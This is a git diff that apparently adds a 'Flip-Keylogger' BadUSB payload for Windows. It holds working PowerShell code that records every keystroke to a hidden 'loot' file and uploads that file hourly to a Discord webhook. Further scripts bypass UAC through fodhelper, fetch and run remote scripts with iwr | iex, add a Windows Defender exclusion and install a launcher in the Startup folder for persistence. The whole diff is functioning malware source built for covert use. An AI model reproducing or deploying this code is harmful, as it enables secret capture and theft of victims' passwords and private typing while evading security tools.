diff --git a/Payloads/Flip-Keylogger/-keys.ps1 b/Payloads/Flip-Keylogger/-keys.ps1 new file mode 100644 index 0000000..282a2cf --- /dev/null +++ b/Payloads/Flip-Keylogger/-keys.ps1 @@ -0,0 +1,62 @@ +function XXXlog($Path="$env:appdata\-locker\$env:UserName-loot.txt"){ + $signatures = @' + [DllImport("user32.dll", CharSet=CharSet.Auto, ExactSpelling=true)] + public static extern short GetAsyncKeyState(int virtualKeyCode); + [DllImport("user32.dll", CharSet=CharSet.Auto)] + public static extern int GetKeyboardState(byte[] keystate); + [DllImport("user32.dll", CharSet=CharSet.Auto)] + public static extern int MapVirtualKey(uint uCode, int uMapType); + [DllImport("user32.dll", CharSet=CharSet.Auto)] + public static extern int ToUnicode(uint wVirtKey, uint wScanCode, byte[] lpkeystate, System.Text.StringBuilder pwszBuff, int cchBuff, uint wFlags); +'@ + + $API = Add-Type -MemberDefinition $signatures -Name 'Win32' -Namespace API -PassThru + + + $null = New-Item -Path $Path -ItemType File -Force + + try + { + Write-Host 'Recording key presses. Press CTRL+C to see results.' -ForegroundColor Red + + while ($true) { + Start-Sleep -Milliseconds 40 + + + for ($ascii = 9; $ascii -le 254; $ascii++) { + + $state = $API::GetAsyncKeyState($ascii) + + + if ($state -eq -32767) { + $null = [console]::CapsLock + + + $virtualKey = $API::MapVirtualKey($ascii, 3) + + + $kbstate = New-Object Byte[] 256 + $checkkbstate = $API::GetKeyboardState($kbstate) + + + $mychar = New-Object -TypeName System.Text.StringBuilder + + $success = $API::ToUnicode($ascii, $virtualKey, $kbstate, $mychar, $mychar.Capacity, 0) + + if ($success) + { + + [System.IO.File]::AppendAllText($Path, $mychar, [System.Text.Encoding]::Unicode) + } + } + } + } + } + finally + { + + #notepad $Path + } +} + +XXXlog diff --git a/Payloads/Flip-Keylogger/-logs.ps1 b/Payloads/Flip-Keylogger/-logs.ps1 new file mode 100644 index 0000000..17d936e --- /dev/null +++ b/Payloads/Flip-Keylogger/-logs.ps1 @@ -0,0 +1,85 @@ +# powershell log scheduler +# created by : C0SM0 +# Modified by : Jakoby + +$Path="$env:appdata\-locker\$env:UserName-loot.txt" + +$dc = (Get-Content "$env:appdata\-locker\wh.txt" -TotalCount 1) + +function Upload-Discord { + +[CmdletBinding()] +param ( + [parameter(Position=0,Mandatory=$False)] + [string]$file, + [parameter(Position=1,Mandatory=$False)] + [string]$text +) + + +$Body = @{ + 'username' = $env:username + 'content' = $text +} + +if (-not ([string]::IsNullOrEmpty($text))){ +Invoke-RestMethod -ContentType 'Application/Json' -Uri $dc -Method Post -Body ($Body | ConvertTo-Json)}; + +if (-not ([string]::IsNullOrEmpty($file))){curl.exe -F "file1=@$file" $dc} +} + +# times logs will be sent [keep in military time] +$logTimes = @( + '00:00:00', + '01:00:00', + '02:00:00', + '03:00:00', + '04:00:00', + '05:00:00', + '06:00:00', + '07:00:00', + '08:00:00', + '09:00:00', + '10:00:00', + '11:00:00', + '12:00:00', + '13:00:00', + '14:00:00', + '15:00:00', + '16:00:00', + '17:00:00', + '18:00:00', + '19:00:00', + '20:00:00', + '21:00:00', + '22:00:00', + '23:00:00' +) + +# sort the times in chronological order +$logTimes = $logTimes | Sort-Object + +# ensure keylogger runs every day +while ($true) { + + # run keylogger for each trigger time + foreach ($t in $logTimes) + { + # checks if time passed already + if((Get-Date) -lt (Get-Date -Date $t)) + { + # sleeps until next time is reached + while ((Get-Date -Date $t) -gt (Get-Date)) + { + # sleeps + (Get-Date -Date $t) - (Get-Date) | Start-Sleep + } + + # runs keylogger + Upload-Discord -file $Path + echo "" > $Path + + + } + } +} diff --git a/Payloads/Flip-Keylogger/-p.cmd b/Payloads/Flip-Keylogger/-p.cmd new file mode 100644 index 0000000..07c8208 --- /dev/null +++ b/Payloads/Flip-Keylogger/-p.cmd @@ -0,0 +1,3 @@ +@echo off +powershell Start-Process powershell.exe -windowstyle hidden "$env:appdata/-locker/-keys.ps1" +powershell Start-Process powershell.exe -windowstyle hidden "$env:appdata/-locker/-logs.ps1" diff --git a/Payloads/Flip-Keylogger/Keylogger.ps1 b/Payloads/Flip-Keylogger/Keylogger.ps1 deleted file mode 100644 index 84f86ba..0000000 --- a/Payloads/Flip-Keylogger/Keylogger.ps1 +++ /dev/null @@ -1 +0,0 @@ -COMING SOON diff --git a/Payloads/Flip-Keylogger/s1.ps1 b/Payloads/Flip-Keylogger/s1.ps1 new file mode 100644 index 0000000..57edda1 --- /dev/null +++ b/Payloads/Flip-Keylogger/s1.ps1 @@ -0,0 +1,17 @@ +if (![System.IO.Directory]::Exists("$env:appdata\-locker")){New-Item -ItemType Directory -Force -Path "$env:appdata\-locker"}; +echo $dc > "$env:appdata\-locker\wh.txt"; + +function s1 { + $user = "$env:COMPUTERNAME\$env:USERNAME" + $isAdmin = (Get-LocalGroupMember 'Administrators').Name -contains $user +if($isAdmin){ + $259="powershell.exe -w h iwr https://raw.githubusercontent.com/I-Am-Jakoby/Flipper-Zero-BadUSB/main/Payloads/Flip-Keylogger/s2.ps1 | iex"; + reg add "HKCU\Software\Classes\.259\Shell\Open\command" /d $259 /f;reg add "HKCU\Software\Classes\ms-settings\CurVer" /d ".259" /f;fodhelper.exe;Start-Sleep -s 3;reg delete "HKCU\Software\Classes\.259\" /f;reg delete "HKCU\Software\Classes\ms-settings\" /f; + + } + else{ + Break + } +} + +s1 diff --git a/Payloads/Flip-Keylogger/s2.ps1 b/Payloads/Flip-Keylogger/s2.ps1 new file mode 100644 index 0000000..35f9358 --- /dev/null +++ b/Payloads/Flip-Keylogger/s2.ps1 @@ -0,0 +1,7 @@ +Add-MpPreference -ExclusionPath $env:appdata/-locker + +iwr https://raw.githubusercontent.com/I-Am-Jakoby/Flipper-Zero-BadUSB/main/Payloads/Flip-Keylogger/-p.cmd -o "$env:userprofile\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\-p.cmd" +iwr https://raw.githubusercontent.com/I-Am-Jakoby/Flipper-Zero-BadUSB/main/Payloads/Flip-Keylogger/-keys.ps1 -o "$env:appdata\-locker\-keys.ps1" +iwr https://raw.githubusercontent.com/I-Am-Jakoby/Flipper-Zero-BadUSB/main/Payloads/Flip-Keylogger/-logs.ps1 -o "$env:appdata\-locker\-logs.ps1" + +start-process "$env:userprofile\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\-p.cmd"